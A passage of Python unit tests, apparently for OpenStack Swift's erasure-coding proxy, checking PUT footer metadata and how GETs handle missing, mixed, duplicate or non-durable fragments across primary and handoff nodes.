self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
'Etag': etag,
})
frag_archives = []
for connection_id, info in put_requests.items():
body = unchunk_body(''.join(info['chunks']))
self.assertIsNotNone(info['boundary'],
"didn't get boundary for conn %r" % (
connection_id,))
self.assertTrue(size > int(info['backend-content-length']) > 0,
"invalid backend-content-length for conn %r" % (
connection_id,))
# email.parser.FeedParser doesn't know how to take a multipart
# message and boundary together and parse it; it only knows how
# to take a string, parse the headers, and figure out the
# boundary on its own.
parser = email.parser.FeedParser()
parser.feed(
"Content-Type: multipart/nobodycares; boundary=%s\r\n\r\n" %
info['boundary'])
parser.feed(body)
message = parser.close()
self.assertTrue(message.is_multipart()) # sanity check
mime_parts = message.get_payload()
self.assertEqual(len(mime_parts), 3)
obj_part, footer_part, commit_part = mime_parts
# attach the body to frag_archives list
self.assertEqual(obj_part['X-Document'], 'object body')
frag_archives.append(obj_part.get_payload())
# assert length was correct for this connection
self.assertEqual(int(info['backend-content-length']),
len(frag_archives[-1]))
# assert length was the same for all connections
self.assertEqual(int(info['backend-content-length']),
len(frag_archives[0]))
# validate some footer metadata
self.assertEqual(footer_part['X-Document'], 'object metadata')
footer_metadata = json.loads(footer_part.get_payload())
self.assertTrue(footer_metadata)
expected = {}
# update expected with footers from the callback...
footers_callback(expected)
expected.update({
'X-Object-Sysmeta-Ec-Content-Length': str(size),
'X-Backend-Container-Update-Override-Size': str(size),
'X-Object-Sysmeta-Ec-Etag': etag,
'X-Backend-Container-Update-Override-Etag': etag,
'X-Object-Sysmeta-Ec-Segment-Size': str(segment_size),
'Etag': md5(obj_part.get_payload()).hexdigest()})
for header, value in expected.items():
self.assertEqual(footer_metadata[header], value)
# sanity on commit message
self.assertEqual(commit_part['X-Document'], 'put commit')
self.assertEqual(len(frag_archives), self.replicas())
fragment_size = self.policy.fragment_size
node_payloads = []
for fa in frag_archives:
payload = [fa[x:x + fragment_size]
for x in range(0, len(fa), fragment_size)]
node_payloads.append(payload)
fragment_payloads = zip(*node_payloads)
expected_body = ''
for fragment_payload in fragment_payloads:
self.assertEqual(len(fragment_payload), self.replicas())
# materialize the zip tuple so pyeclib receives a list
fragment_payload = list(fragment_payload)
expected_body += self.policy.pyeclib_driver.decode(
fragment_payload)
self.assertEqual(len(test_body), len(expected_body))
self.assertEqual(test_body, expected_body)
def test_PUT_with_footers(self):
# verify footers supplied by a footers callback being added to
# trailing metadata
segment_size = self.policy.ec_segment_size
test_body = ('asdf' * segment_size)[:-10]
etag = md5(test_body).hexdigest()
size = len(test_body)
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
resp_headers = {
'Some-Other-Header': 'Four',
'Etag': 'ignored',
}
def do_test(footers_to_add, expect_added):
put_requests = defaultdict(
lambda: {'boundary': None, 'chunks': []})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['boundary'] = headers[
'X-Backend-Obj-Multipart-Mime-Boundary']
put_requests[conn_id]['x-timestamp'] = headers[
'X-Timestamp']
def footers_callback(footers):
footers.update(footers_to_add)
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', environ=env, body=test_body)
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
'Etag': etag,
})
for connection_id, info in put_requests.items():
body = unchunk_body(''.join(info['chunks']))
# email.parser.FeedParser doesn't know how to take a multipart
# message and boundary together and parse it; it only knows how
# to take a string, parse the headers, and figure out the
# boundary on its own.
parser = email.parser.FeedParser()
parser.feed(
"Content-Type: multipart/nobodycares; boundary=%s\r\n\r\n"
% info['boundary'])
parser.feed(body)
message = parser.close()
self.assertTrue(message.is_multipart()) # sanity check
mime_parts = message.get_payload()
self.assertEqual(len(mime_parts), 3)
obj_part, footer_part, commit_part = mime_parts
# validate EC footer metadata - should always be present
self.assertEqual(footer_part['X-Document'], 'object metadata')
footer_metadata = json.loads(footer_part.get_payload())
self.assertIsNotNone(
footer_metadata.pop('X-Object-Sysmeta-Ec-Frag-Index'))
expected = {
'X-Object-Sysmeta-Ec-Scheme':
self.policy.ec_scheme_description,
'X-Object-Sysmeta-Ec-Content-Length': str(size),
'X-Object-Sysmeta-Ec-Etag': etag,
'X-Object-Sysmeta-Ec-Segment-Size': str(segment_size),
'Etag': md5(obj_part.get_payload()).hexdigest()}
expected.update(expect_added)
for header, value in expected.items():
self.assertIn(header, footer_metadata)
self.assertEqual(value, footer_metadata[header])
footer_metadata.pop(header)
self.assertFalse(footer_metadata)
# sanity check - middleware sets no footer, expect EC overrides
footers_to_add = {}
expect_added = {
'X-Backend-Container-Update-Override-Size': str(size),
'X-Backend-Container-Update-Override-Etag': etag}
do_test(footers_to_add, expect_added)
# middleware cannot overwrite any EC sysmeta
footers_to_add = {
'X-Object-Sysmeta-Ec-Content-Length': str(size + 1),
'X-Object-Sysmeta-Ec-Etag': 'other etag',
'X-Object-Sysmeta-Ec-Segment-Size': str(segment_size + 1),
'X-Object-Sysmeta-Ec-Unused-But-Reserved': 'ignored'}
do_test(footers_to_add, expect_added)
# middleware can add x-object-sysmeta- headers including
# x-object-sysmeta-container-update-override headers
footers_to_add = {
'X-Object-Sysmeta-Foo': 'bar',
'X-Object-Sysmeta-Container-Update-Override-Size':
str(size + 1),
'X-Object-Sysmeta-Container-Update-Override-Etag': 'other etag',
'X-Object-Sysmeta-Container-Update-Override-Ping': 'pong'
}
expect_added.update(footers_to_add)
do_test(footers_to_add, expect_added)
# middleware can also overwrite x-backend-container-update-override
# headers
override_footers = {
'X-Backend-Container-Update-Override-Wham': 'bam',
'X-Backend-Container-Update-Override-Size': str(size + 2),
'X-Backend-Container-Update-Override-Etag': 'another etag'}
footers_to_add.update(override_footers)
expect_added.update(override_footers)
do_test(footers_to_add, expect_added)
def test_PUT_old_obj_server(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
responses = [
# one server will respond 100-continue but not include the
# required expect headers, and the connection will be dropped
((100, Exception('not used')), {}),
] + [
# and plenty of successful responses too
(201, {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes',
}),
] * self.replicas()
random.shuffle(responses)
if responses[-1][0] != 201:
# whoops, stupid random
responses = responses[1:] + [responses[0]]
codes, expect_headers = zip(*responses)
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_GET_with_frags_swapped_around(self):
segment_size = self.policy.ec_segment_size
test_data = ('test' * segment_size)[:-657]
etag = md5(test_data).hexdigest()
ec_archive_bodies = self._make_ec_archive_bodies(test_data)
_part, primary_nodes = self.obj_ring.get_nodes('a', 'c', 'o')
node_key = lambda n: (n['ip'], n['port'])
backend_index = self.policy.get_backend_index
ts = next(self._ts_iter)
response_map = {
node_key(n): StubResponse(
200, ec_archive_bodies[backend_index(i)], {
'X-Object-Sysmeta-Ec-Content-Length': len(test_data),
'X-Object-Sysmeta-Ec-Etag': etag,
'X-Object-Sysmeta-Ec-Frag-Index': backend_index(i),
'X-Timestamp': ts.normal,
'X-Backend-Timestamp': ts.internal
}) for i, n in enumerate(primary_nodes)
}
# swap a parity response into a data node
data_node = random.choice(primary_nodes[:self.policy.ec_ndata])
parity_node = random.choice(
primary_nodes[
self.policy.ec_ndata:self.policy.ec_n_unique_fragments])
(response_map[node_key(data_node)],
response_map[node_key(parity_node)]) = \
(response_map[node_key(parity_node)],
response_map[node_key(data_node)])
def get_response(req):
req_key = (req['ip'], req['port'])
return response_map.pop(req_key)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(len(log), self.policy.ec_ndata)
self.assertEqual(len(response_map),
len(primary_nodes) - self.policy.ec_ndata)
def test_GET_with_no_success(self):
node_frags = [[]] * 28 # no frags on any node (2 * replicas)
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_with_only_handoffs(self):
obj1 = self._make_ec_object_stub()
node_frags = [[]] * self.replicas() # all primaries missing
node_frags = node_frags + [ # handoffs
{'obj': obj1, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj1, 'frag': 7},
{'obj': obj1, 'frag': 8},
{'obj': obj1, 'frag': 9},
{'obj': obj1, 'frag': 10}, # parity
{'obj': obj1, 'frag': 11}, # parity
{'obj': obj1, 'frag': 12}, # parity
{'obj': obj1, 'frag': 13}, # parity
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
collected_responses = defaultdict(list)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].append(index)
# GETS would be required to all primaries and then ndata handoffs
self.assertEqual(len(log), self.replicas() + self.policy.ec_ndata)
self.assertEqual(2, len(collected_responses))
# 404s
self.assertEqual(self.replicas(), len(collected_responses[None]))
self.assertEqual(self.policy.ec_ndata,
len(collected_responses[obj1['etag']]))
def test_GET_with_single_missed_overwrite_does_not_need_handoff(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
node_frags = [
{'obj': obj2, 'frag': 0},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2}, # missed overwrite
{'obj': obj2, 'frag': 3},
{'obj': obj2, 'frag': 4},
{'obj': obj2, 'frag': 5},
{'obj': obj2, 'frag': 6},
{'obj': obj2, 'frag': 7},
{'obj': obj2, 'frag': 8},
{'obj': obj2, 'frag': 9},
{'obj': obj2, 'frag': 10}, # parity
{'obj': obj2, 'frag': 11}, # parity
{'obj': obj2, 'frag': 12}, # parity
{'obj': obj2, 'frag': 13}, # parity
# {'obj': obj2, 'frag': 2}, # handoff (not used in this test)
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# because the primary nodes are shuffled, it's possible the proxy
# didn't even notice the missed overwrite frag - but it might have
self.assertLessEqual(len(log), self.policy.ec_ndata + 1)
self.assertLessEqual(len(collected_responses), 2)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_many_missed_overwrite_will_need_handoff(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
node_frags = [
{'obj': obj2, 'frag': 0},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2}, # missed
{'obj': obj2, 'frag': 3},
{'obj': obj2, 'frag': 4},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6}, # missed
{'obj': obj2, 'frag': 7},
{'obj': obj2, 'frag': 8},
{'obj': obj1, 'frag': 9}, # missed
{'obj': obj1, 'frag': 10}, # missed
{'obj': obj1, 'frag': 11}, # missed
{'obj': obj2, 'frag': 12},
{'obj': obj2, 'frag': 13},
{'obj': obj2, 'frag': 6}, # handoff
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# there's not enough of the obj2 etag on the primaries, so we would
# have collected responses for both etags, and would have made one
# more request to the handoff node
self.assertEqual(len(log), self.replicas() + 1)
self.assertEqual(len(collected_responses), 2)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_succeed(self):
obj1 = self._make_ec_object_stub(pattern='obj1', timestamp=self.ts())
obj2 = self._make_ec_object_stub(pattern='obj2', timestamp=self.ts())
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
[],
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
[],
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
[],
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
[],
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
[],
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
[],
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
[],
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
[],
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
[],
{'obj': obj2, 'frag': 9},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# we go exactly as long as we have to, finding two different
# etags and some 404's (i.e. collected_responses[None])
self.assertEqual(len(log), len(node_frags))
self.assertEqual(len(collected_responses), 3)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_stop(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
[],
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
[],
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
[],
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
[],
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
[],
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
[],
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
[],
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
[],
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
[],
# handoffs are iter'd in order so proxy will see 404 from this
# final handoff
[],
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# default node_iter will exhaust at 2 * replicas
self.assertEqual(len(log), 2 * self.replicas())
self.assertEqual(len(collected_responses), 3)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
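# A minimal sketch (illustrative, based only on the assertions above) of
# the node_iter exhaustion bound: the proxy probes every primary and, by
# default, as many handoffs again before giving up, i.e. 2 * replicas.
def _sketch_node_iter_budget(self):
    primaries = self.replicas()
    handoffs = self.replicas()  # default request_node_count is 2 * replicas
    return primaries + handoffs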
def test_GET_with_duplicate_and_hidden_frag_indexes(self):
obj1 = self._make_ec_object_stub()
# proxy should ignore duplicated frag indexes and continue search for
# a set of unique indexes, finding last one on a handoff
node_frags = [
[{'obj': obj1, 'frag': 0}, {'obj': obj1, 'frag': 5}],
{'obj': obj1, 'frag': 0}, # duplicate frag
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 1}, # duplicate frag
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 2}, # duplicate frag
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 3}, # duplicate frag
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 4}, # duplicate frag
{'obj': obj1, 'frag': 10},
{'obj': obj1, 'frag': 11},
{'obj': obj1, 'frag': 12},
{'obj': obj1, 'frag': 13},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
# Expect a maximum of one request to each primary plus one extra
# request to node 1. Actual value could be less if the extra request
# occurs and quorum is reached before requests to nodes with a
# duplicate frag.
self.assertLessEqual(len(log), self.replicas() + 1)
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), self.policy.ec_ndata)
def test_GET_with_missing_and_mixed_frags_may_503(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# we get a 503 when all the handoffs return 200 but no single etag
# ever reaches quorum
node_frags = [[]] * self.replicas() # primaries have no frags
node_frags = node_frags + [ # handoffs all have frags
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
# never get a quorum so all nodes are searched
self.assertEqual(len(log), 2 * self.replicas())
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), 7)
def test_GET_with_mixed_frags_and_no_quorum_will_503(self):
# all nodes have a frag but no one set reaches quorum, and because
# there is no backend 404 response either, the proxy can only give
# up with a 503
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
obj3 = self._make_ec_object_stub(pattern='obj3')
obj4 = self._make_ec_object_stub(pattern='obj4')
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj3, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj3, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj3, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj3, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj3, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj3, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
{'obj': obj3, 'frag': 6},
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
{'obj': obj3, 'frag': 7},
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
{'obj': obj3, 'frag': 8},
{'obj': obj4, 'frag': 8},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
collected_etags = set()
collected_status = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag)
collected_status.add(conn.resp.status)
# default node_iter will exhaust at 2 * replicas
self.assertEqual(len(log), 2 * self.replicas())
self.assertEqual(
{obj1['etag'], obj2['etag'], obj3['etag'], obj4['etag']},
collected_etags)
self.assertEqual({200}, collected_status)
def test_GET_with_quorum_durable_files(self):
# verify that only (ec_nparity + 1) nodes need to be durable for a GET
# to be completed with ec_ndata requests.
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': True}, # durable
{'obj': obj1, 'frag': 1, 'durable': True}, # durable
{'obj': obj1, 'frag': 2, 'durable': True}, # durable
{'obj': obj1, 'frag': 3, 'durable': True}, # durable
{'obj': obj1, 'frag': 4, 'durable': True}, # durable
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
] # handoffs not used in this scenario
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
self.assertEqual(self.policy.ec_ndata, len(log))
collected_durables = []
for conn in log:
if (conn.resp.headers.get('X-Backend-Durable-Timestamp')
== conn.resp.headers.get('X-Backend-Data-Timestamp')):
collected_durables.append(conn)
# because nodes are shuffled we can't be sure how many durables are
# returned but it must be at least 1 and cannot exceed 5
self.assertLessEqual(len(collected_durables), 5)
self.assertGreaterEqual(len(collected_durables), 1)
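# A minimal sketch (a pigeonhole argument, not Swift's implementation) of
# why ec_nparity + 1 durable frags are enough: any ec_ndata-sized subset
# of the ec_ndata + ec_nparity primaries can exclude at most ec_nparity
# frags, so at least one durable frag is always collected.
def _sketch_durable_pigeonhole(self):
    ndata, nparity = self.policy.ec_ndata, self.policy.ec_nparity
    durables = nparity + 1
    excluded_at_most = nparity               # frags a GET may never see
    return durables - excluded_at_most >= 1  # always True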
def test_GET_with_single_durable_file(self):
# verify that a single durable is sufficient for a GET
# to be completed with ec_ndata requests.
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': True}, # durable
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
] # handoffs not used in this scenario
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
collected_durables = []
for conn in log:
if (conn.resp.headers.get('X-Backend-Durable-Timestamp')
== conn.resp.headers.get('X-Backend-Data-Timestamp')):
collected_durables.append(conn)
# because nodes are shuffled we can't be sure how many non-durables
# are returned before the durable, but we do expect a single durable
self.assertEqual(1, len(collected_durables))
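# A minimal sketch of the durability check used by these tests (mirroring
# the header comparison in the loop above): a frag response counts as
# durable when its durable timestamp has caught up with its data timestamp.
def _sketch_is_durable_response(self, resp_headers):
    return (resp_headers.get('X-Backend-Durable-Timestamp')
            == resp_headers.get('X-Backend-Data-Timestamp'))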
def test_GET_with_no_durable_files(self):
# verify that at least one durable is necessary for a successful GET
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
] + [[]] * self.replicas() # handoffs
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# all 28 nodes tried with an optimistic get, none are durable and none
# report having a durable timestamp
self.assertEqual(28, len(log))
def test_GET_with_missing_durable_files_and_mixed_etags(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# non-quorate durables for another object won't stop us finding the
# quorate object
node_frags = [
# ec_ndata - 1 frags of obj2 are available and durable
{'obj': obj2, 'frag': 0, 'durable': True},
{'obj': obj2, 'frag': 1, 'durable': True},
{'obj': obj2, 'frag': 2, 'durable': True},
{'obj': obj2, 'frag': 3, 'durable': True},
{'obj': obj2, 'frag': 4, 'durable': True},
{'obj': obj2, 'frag': 5, 'durable': True},
{'obj': obj2, 'frag': 6, 'durable': True},
{'obj': obj2, 'frag': 7, 'durable': True},
{'obj': obj2, 'frag': 8, 'durable': True},
# ec_ndata frags of obj1 are available and one is durable
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': True},
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
# Quorum of non-durables for a different object won't
# prevent us hunting down the durable object
node_frags = [
# primaries
{'obj': obj2, 'frag': 0, 'durable': False},
{'obj': obj2, 'frag': 1, 'durable': False},
{'obj': obj2, 'frag': 2, 'durable': False},
{'obj': obj2, 'frag': 3, 'durable': False},
{'obj': obj2, 'frag': 4, 'durable': False},
{'obj': obj2, 'frag': 5, 'durable': False},
{'obj': obj2, 'frag': 6, 'durable': False},
{'obj': obj2, 'frag': 7, 'durable': False},
{'obj': obj2, 'frag': 8, 'durable': False},
{'obj': obj2, 'frag': 9, 'durable': False},
